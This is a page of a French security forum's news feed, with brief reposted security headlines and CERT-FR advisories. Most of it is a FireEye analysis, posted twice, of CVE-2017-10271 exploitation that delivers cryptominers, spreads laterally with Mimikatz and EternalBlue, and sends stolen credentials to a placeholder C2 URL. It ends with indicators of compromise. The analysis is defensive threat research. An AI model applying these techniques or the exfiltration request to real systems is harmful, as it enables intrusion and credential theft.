Messages récents

Pages: 1 2 3 [4] 5 6 7 8 9 10
31
News / [AVAST]The essential guide to VPNs: What they are and how they work
« Dernier message par igor51 le février 16, 2018, 04:00:37 »
The essential guide to VPNs: What they are and how they work

What is a VPN connection and why are so many people talking about it? The term crops up in every conversation about the internet lately, and for good reason. While VPNs were once novel tech solutions, they are now necessary tools. At the basic level, VPNs protect your privacy online so you cannot be targeted, tracked, or discriminated against based on location.


Source: The essential guide to VPNs: What they are and how they work
32
CERTFR-2018-AVI-088 : Multiples vulnérabilités dans les produits Microsoft (14 février 2018)

De multiples vulnérabilités ont été corrigées dans les produits Microsoft. Elles permettent à un attaquant de provoquer une exécution de code à distance.


Source: CERTFR-2018-AVI-088 : Multiples vulnérabilités dans les produits Microsoft (14 février 2018)
33
CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques
Used Post-Exploitation and Pre-Mining


Introduction


 

FireEye researchers recently observed threat actors abusing
  CVE-2017-10271 to deliver various cryptocurrency miners.


 

CVE-2017-10271 is a known input validation vulnerability that exists
  in the WebLogic Server Security Service (WLS Security) in Oracle
  WebLogic Server versions 12.2.1.2.0 and prior, and attackers can
  exploit it to remotely execute arbitrary code. Oracle released a     href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">Critical
    Patch Update that reportedly fixes this vulnerability. Users who
  failed to patch their systems may find themselves mining
  cryptocurrency for threat actors.


 

FireEye observed a high volume of activity associated with the
  exploitation of CVE-2017-10271 following the public posting of proof
  of concept code in December 2017. Attackers then leveraged this
  vulnerability to download cryptocurrency miners in victim environments.


 

We saw evidence of organizations located in various countries –
  including the United States, Australia, Hong Kong, United Kingdom,
  India, Malaysia, and Spain, as well as those from
  nearly every industry vertical – being impacted by this activity.
  Actors involved in cryptocurrency mining operations mainly exploit
  opportunistic targets rather than specific organizations. This coupled
  with the diversity of organizations potentially affected by this
  activity suggests that the external targeting calculus of these
  attacks is indiscriminate in nature.


 

The recent cryptocurrency boom has resulted in a growing number of
  operations – employing diverse tactics – aimed at stealing
  cryptocurrencies. The idea that these cryptocurrency mining operations
  are less risky, along with the potentially nice profits, could lead
  cyber criminals to begin shifting away from ransomware campaigns.


 

Tactic #1: Delivering the miner directly to a vulnerable server


 

Some tactics we've observed involve exploiting CVE-2017-10271,
  leveraging PowerShell to download the miner directly onto the victim’s
  system (Figure 1), and executing it using ShellExecute().


 


 
 
 Figure 1: Downloading the payload directly


 

Tactic #2: Utilizing PowerShell scripts to deliver the miner


 

Other tactics involve the exploit delivering a PowerShell script,
  instead of downloading the executable directly (Figure 2).


 


 
 
 Figure 2: Exploit delivering PowerShell script


 

This script has the following functionalities:


 

  •     Downloading miners from remote servers

 


 
 
 Figure 3: Downloading cryptominers


 

As shown in Figure 3, the .ps1 script
  tries to download the payload from the remote server to a vulnerable server.


 

  •     Creating scheduled tasks for persistence

 


 
 
 Figure 4: Creation of scheduled task


 

  •     Deleting scheduled tasks of other known cryptominers

 


 
 
 Figure 5: Deletion of scheduled tasks
    related to other miners


 

In Figure 4, the cryptominer creates a
  scheduled task with name “Update service for Oracle
  products1
”.  In Figure 5, a different variant deletes this task
  and other similar tasks after creating its own, “Update service for
    Oracle productsa
”.  


 

From this, it’s quite clear that
  different attackers are fighting over the resources available in the system.


 

  •     Killing processes matching certain strings associated with other
      cryptominers

 


 
 
 Figure 6: Terminating processes directly


 


 
 
 Figure 7: Terminating processes matching
    certain strings


 

Similar to scheduled tasks deletion,
  certain known mining processes are also terminated (Figure 6 and
  Figure 7).


 

  •     Connects to mining pools with wallet key

 


 
 
 Figure 8: Connection to mining pools


 

The miner is then executed with
  different flags to connect to mining pools (Figure 8). Some of the
  other observed flags are: -a for algorithm, -k for keepalive to
  prevent timeout, -o for URL of mining server, -u for wallet key, -p
  for password of mining server, and -t for limiting the number of miner threads.


 

  •     Limiting CPU usage to avoid suspicion

 


 
 
 Figure 9: Limiting CPU Usage


 

To avoid suspicion, some attackers are
  limiting the CPU usage of the miner (Figure 9).


 

Tactic #3: Lateral movement across Windows environments using
  Mimikatz and EternalBlue


 

Some tactics involve spreading laterally across a victim’s
  environment using dumped Windows credentials and the   href="https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html">EternalBlue vulnerability
    (CVE-2017-0144).


 

The malware checks whether its running on a 32-bit or 64-bit system
  to determine which PowerShell script to grab from the command and
  control (C2) server. It looks at every network adapter, aggregating
  all destination IPs of established non-loopback network connections.
  Every IP address is then tested with extracted credentials and a
  credential-based execution of PowerShell is attempted that downloads
  and executes the malware from the C2 server on the target machine.
  This variant maintains persistence via WMI (Windows Management Instrumentation).


 

The malware also has the capability to perform a   href="https://en.wikipedia.org/wiki/Pass_the_hash">Pass-the-Hash
  attack with the NTLM information derived from Mimikatz in order to
  download and execute the malware in remote systems.


 

Additionally, the malware exfiltrates stolen credentials to the
  attacker via an HTTP GET request to:
  'http://<C2>:8000/api.php?data=<credential data>'.


 

If the lateral movement with credentials fails, then the malware
  uses PingCastle MS17-010 scanner (PingCastle is a French Active
  Directory security tool) to scan that particular host to determine if
  its vulnerable to EternalBlue, and uses it to spread to that host.


 

After all network derived IPs have been processed, the malware
  generates random IPs and uses the same combination of PingCastle and
  EternalBlue to spread to that host.


 

Tactic #4: Scenarios observed in Linux OS


 

We’ve also observed this vulnerability being exploited to deliver
  shell scripts (Figure 10) that have functionality similar to the
  PowerShell scripts.


 


 
 
 Figure 10: Delivery of shell scripts


 

The shell script performs the following activities:


 

  •     Attempts to kill already running cryptominers

 


 
 
 Figure 11: Terminating processes matching
    certain strings


 

  •     Downloads and executes cryptominer malware

 


 
 
 Figure 12: Downloading CryptoMiner


 

  •     Creates a cron job to maintain persistence

 


 
 
 Figure 13: Cron job for persistence


 

  •     Tries to kill other potential miners to hog the CPU
      usage

 


 
 
 Figure 14: Terminating other potential miners


 

The function shown in Figure 14 is used
  to find processes that have high CPU usage and terminate them. This
  terminates other potential miners and maximizes the utilization of resources.


 

Conclusion


 

Use of cryptocurrency mining malware is a popular tactic leveraged
  by financially-motivated cyber criminals to make money from victims.
  We’ve observed one threat actor mining around 1 XMR/day, demonstrating
  the potential profitability and reason behind the recent rise in such
  attacks. Additionally, these operations may be perceived as less risky
  when compared to ransomware operations, since victims may not even
  know the activity is occurring beyond the slowdown in system performance.


 

Notably, cryptocurrency mining malware is being distributed using
  various tactics, typically in an opportunistic and indiscriminate
  manner so cyber criminals will maximize their outreach and profits.


 

FireEye HX, being a behavior-based solution, is not affected by
  cryptominer tricks. FireEye HX detects these threats at the initial
  level of the attack cycle, when the attackers attempt to deliver the
  first stage payload or when the miner tries to connect to mining pools.


 

At the time of writing, FireEye HX detects this activity with the
  following indicators:


 
   
     
   
     
   
     
   
     


          Detection Name

POWERSHELL DOWNLOADER
        (METHODOLOGY)

MONERO MINER (METHODOLOGY)


     

MIMIKATZ (CREDENTIAL STEALER)


     

 

Indicators of Compromise


 
   
     
   
              width="155" valign="top">

cranberry.exe/logic.exe


   
              width="155" valign="top">

xmrig.exe/yam.exe


   
              width="155" valign="top">

1.ps1


   
              width="155" valign="top">

2.ps1


   
              width="155" valign="top">

info3.ps1


   
              width="155" valign="top">

info6.ps1


   
              width="155" valign="top">

lower.css


   
              width="155" valign="top">

lib.css


   
              width="155" valign="top">

bootstrap.css


          MD5


          Name

        valign="top">

3421A769308D39D4E9C7E8CAECAF7FC4

        valign="top">

B3A831BFA590274902C77B6C7D4C31AE

        valign="top">

26404FEDE71F3F713175A3A3CEBC619B

        valign="top">

D3D10FAA69A10AC754E3B7DDE9178C22

        valign="top">

9C91B5CF6ECED54ABB82D1050C5893F2

        valign="top">

3AAD3FABF29F9DF65DCBD0F308FF0FA8

        valign="top">

933633F2ACFC5909C83F5C73B6FC97CC

        valign="top">

B47DAF937897043745DF81F32B9D7565

        valign="top">

3542AC729035C0F3DB186DDF2178B6A0


 

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their
  help in the analysis.


Source: CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques
Used Post-Exploitation and Pre-Mining
34
CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques
Used Post-Exploitation and Pre-Mining


Introduction


 

FireEye researchers recently observed threat actors abusing
  CVE-2017-10271 to deliver various cryptocurrency miners.


 

CVE-2017-10271 is a known input validation vulnerability that exists
  in the WebLogic Server Security Service (WLS Security) in Oracle
  WebLogic Server versions 12.2.1.2.0 and prior, and attackers can
  exploit it to remotely execute arbitrary code. Oracle released a     href="http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html">Critical
    Patch Update that reportedly fixes this vulnerability. Users who
  failed to patch their systems may find themselves mining
  cryptocurrency for threat actors.


 

FireEye observed a high volume of activity associated with the
  exploitation of CVE-2017-10271 following the public posting of proof
  of concept code in December 2017. Attackers leveraged this
  vulnerability to subsequently download cryptocurrency miners in victim
  environments. The recent cryptocurrency boom has resulted in a growing
  number of operations – employing diverse tactics – aimed at stealing
  cryptocurrencies. The idea that these cryptocurrency mining operations
  are less risky, along with the potentially nice profits, could lead
  cyber criminals to begin shifting away from ransomware campaigns.


 

Tactic #1: Delivering the miner directly to a vulnerable server


 

Some tactics we've observed involve exploiting CVE-2017-10271,
  leveraging PowerShell to download the miner directly onto the victim’s
  system (Figure 1), and executing it using ShellExecute().


 


 
 
 Figure 1: Downloading the payload directly


 

Tactic #2: Utilizing PowerShell scripts to deliver the miner


 

Other tactics involve the exploit delivering a PowerShell script,
  instead of downloading the executable directly (Figure 2).


 


 
 
 Figure 2: Exploit delivering PowerShell script


 

This script has the following functionalities:


 

  •     Downloading miners from remote servers

 


 
 
 Figure 3: Downloading cryptominers


 

As shown in Figure 3, the .ps1 script
  tries to download the payload from the remote server to a vulnerable server.


 

  •     Creating scheduled tasks for persistence

 


 
 
 Figure 4: Creation of scheduled task


 

  •     Deleting scheduled tasks of other known cryptominers

 


 
 
 Figure 5: Deletion of scheduled tasks
    related to other miners


 

In Figure 4, the cryptominer creates a
  scheduled task with name “Update service for Oracle
  products1
”.  In Figure 5, a different variant deletes this task
  and other similar tasks after creating its own, “Update service for
    Oracle productsa
”.  


 

From this, it’s quite clear that
  different attackers are fighting over the resources available in the system.


 

  •     Killing processes matching certain strings associated with other
      cryptominers

 


 
 
 Figure 6: Terminating processes directly


 


 
 
 Figure 7: Terminating processes matching
    certain strings


 

Similar to scheduled tasks deletion,
  certain known mining processes are also terminated (Figure 6 and
  Figure 7).


 

  •     Connects to mining pools with wallet key

 


 
 
 Figure 8: Connection to mining pools


 

The miner is then executed with
  different flags to connect to mining pools (Figure 8). Some of the
  other observed flags are: -a for algorithm, -k for keepalive to
  prevent timeout, -o for URL of mining server, -u for wallet key, -p
  for password of mining server, and -t for limiting the number of miner threads.


 

  •     Limiting CPU usage to avoid suspicion

 


 
 
 Figure 9: Limiting CPU Usage


 

To avoid suspicion, some attackers are
  limiting the CPU usage of the miner (Figure 9).


 

Tactic #3: Lateral movement across Windows environments using
  Mimikatz and EternalBlue


 

Some tactics involve spreading laterally across a victim’s
  environment using dumped Windows credentials and the   href="https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html">EternalBlue vulnerability
    (CVE-2017-0144).


 

The malware checks whether its running on a 32-bit or 64-bit system
  to determine which PowerShell script to grab from the command and
  control (C2) server. It looks at every network adapter, aggregating
  all destination IPs of established non-loopback network connections.
  Every IP address is then tested with extracted credentials and a
  credential-based execution of PowerShell is attempted that downloads
  and executes the malware from the C2 server on the target machine.
  This variant maintains persistence via WMI (Windows Management Instrumentation).


 

The malware also has the capability to perform a   href="https://en.wikipedia.org/wiki/Pass_the_hash">Pass-the-Hash
  attack with the NTLM information derived from Mimikatz in order to
  download and execute the malware in remote systems.


 

Additionally, the malware exfiltrates stolen credentials to the
  attacker via an HTTP GET request to:
  'http://<C2>:8000/api.php?data=<credential data>'.


 

If the lateral movement with credentials fails, then the malware
  uses PingCastle MS17-010 scanner (PingCastle is a French Active
  Directory security tool) to scan that particular host to determine if
  its vulnerable to EternalBlue, and uses it to spread to that host.


 

After all network derived IPs have been processed, the malware
  generates random IPs and uses the same combination of PingCastle and
  EternalBlue to spread to that host.


 

Tactic #4: Scenarios observed in Linux OS


 

We’ve also observed this vulnerability being exploited to deliver
  shell scripts (Figure 10) that have functionality similar to the
  PowerShell scripts.


 


 
 
 Figure 10: Delivery of shell scripts


 

The shell script performs the following activities:


 

  •     Attempts to kill already running cryptominers

 


 
 
 Figure 11: Terminating processes matching
    certain strings


 

  •     Downloads and executes cryptominer malware

 


 
 
 Figure 12: Downloading CryptoMiner


 

  •     Creates a cron job to maintain persistence

 


 
 
 Figure 13: Cron job for persistence


 

  •     Tries to kill other potential miners to hog the CPU
      usage

 


 
 
 Figure 14: Terminating other potential miners


 

The function shown in Figure 14 is used
  to find processes that have high CPU usage and terminate them. This
  terminates other potential miners and maximizes the utilization of resources.


 

Conclusion


 

Use of cryptocurrency mining malware is a popular tactic leveraged
  by financially-motivated cyber criminals to make money from victims.
  We’ve observed one threat actor mining around 1 XMR/day, demonstrating
  the potential profitability and reason behind the recent rise in such
  attacks. Additionally, these operations may be perceived as less risky
  when compared to ransomware operations, since victims may not even
  know the activity is occurring beyond the slowdown in system performance.


 

Notably, cryptocurrency mining malware is being distributed using
  various tactics, typically in an opportunistic and indiscriminate
  manner so cyber criminals will maximize their outreach and profits.


 

FireEye HX, being a behavior-based solution, is not affected by
  cryptominer tricks. FireEye HX detects these threats at the initial
  level of the attack cycle, when the attackers attempt to deliver the
  first stage payload or when the miner tries to connect to mining pools.


 

At the time of writing, FireEye HX detects this activity with the
  following indicators:


 
   
     
   
     
   
     
   
     


          Detection Name

POWERSHELL DOWNLOADER
        (METHODOLOGY)

MONERO MINER (METHODOLOGY)


     

MIMIKATZ (CREDENTIAL STEALER)


     

 

Indicators of Compromise


 
   
     
   
              width="155" valign="top">

cranberry.exe/logic.exe


   
              width="155" valign="top">

xmrig.exe/yam.exe


   
              width="155" valign="top">

1.ps1


   
              width="155" valign="top">

2.ps1


   
              width="155" valign="top">

info3.ps1


   
              width="155" valign="top">

info6.ps1


   
              width="155" valign="top">

lower.css


   
              width="155" valign="top">

lib.css


   
              width="155" valign="top">

bootstrap.css


          MD5


          Name

        valign="top">

3421A769308D39D4E9C7E8CAECAF7FC4

        valign="top">

B3A831BFA590274902C77B6C7D4C31AE

        valign="top">

26404FEDE71F3F713175A3A3CEBC619B

        valign="top">

D3D10FAA69A10AC754E3B7DDE9178C22

        valign="top">

9C91B5CF6ECED54ABB82D1050C5893F2

        valign="top">

3AAD3FABF29F9DF65DCBD0F308FF0FA8

        valign="top">

933633F2ACFC5909C83F5C73B6FC97CC

        valign="top">

B47DAF937897043745DF81F32B9D7565

        valign="top">

3542AC729035C0F3DB186DDF2178B6A0


 

Thanks to Dileep Kumar Jallepalli and Charles Carmakal for their
  help in the analysis.


Source: CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques
Used Post-Exploitation and Pre-Mining
35
News / [kreb]New EU Privacy Law May Weaken Security
« Dernier message par igor51 le février 15, 2018, 19:00:06 »
New EU Privacy Law May Weaken Security

Companies around the globe are scrambling to comply with new European privacy regulations that take effect a little more than three months from now. But many security experts are worried that the changes being ushered in by the rush to adhere to the law may make it more difficult to track down cybercriminals and less likely that organizations will be willing to share data about new online threats.

On May 25, 2018, the General Data Protection Regulation (GDPR) takes effect. The law, enacted by the European Parliament, requires technology companies to get affirmative consent for any information they collect on people within the European Union. Organizations that violate the GDPR could face fines of up to four percent of global annual revenues.
Source: New EU Privacy Law May Weaken Security
36
News / [Sophos]Coinmining frenzy is making it hard for us to find aliens
« Dernier message par igor51 le février 15, 2018, 17:00:08 »
Coinmining frenzy is making it hard for us to find aliens

As cryptocurrency values have soared, so too has the cost of the hardware needed to mine them - if you can even buy the GPUs, given the shortages.
Source: Coinmining frenzy is making it hard for us to find aliens
37
CERTFR-2018-AVI-087 : Multiples vulnérabilités dans Microsoft Windows (14 février 2018)

De multiples vulnérabilités ont été corrigées dans Microsoft Windows. Elles permettent à un attaquant de provoquer un déni de service, une divulgation d'informations, une élévation de privilèges, un contournement de la fonctionnalité de sécurité et une exécution …
Source: CERTFR-2018-AVI-087 : Multiples vulnérabilités dans Microsoft Windows (14 février 2018)

38
News / [Eset]Concerns about data breaches hitting all-time high
« Dernier message par igor51 le février 15, 2018, 15:00:16 »
Concerns about data breaches hitting all-time high

A record-high proportion of organizations worldwide (67%) said that they had been breached at some point, up from 56% in the report’s previous edition.
The post Concerns about data breaches hitting all-time high appeared first on WeLiveSecurity

Source: Concerns about data breaches hitting all-time high
39
News / [Trend]Vulnerabilities in Apache CouchDB Open the Door to Monero Miners
« Dernier message par igor51 le février 15, 2018, 15:00:15 »
Vulnerabilities in Apache CouchDB Open the Door to Monero Miners

. Based on data from our sensors that we deployed worldwide, we have observed a new attack that exploits two vulnerabilities in a popular database system to deliver miners (detected by Trend Micro as HKTL_COINMINE.GE, HKTL_COINMINE.GP, and HKTL_COINMINE.GQ) for the Monero cryptocurrency.


Post from: Trendlabs Security Intelligence Blog - by Trend Micro


Vulnerabilities in Apache CouchDB Open the Door to Monero Miners


Source: Vulnerabilities in Apache CouchDB Open the Door to Monero Miners
40
CERTFR-2018-AVI-086 : Multiples vulnérabilités dans Microsoft Office (14 février 2018)

[html]

De multiples vulnérabilités ont été corrigées dans Microsoft Office. Elles permettent

Pages: 1 2 3 [4] 5 6 7 8 9 10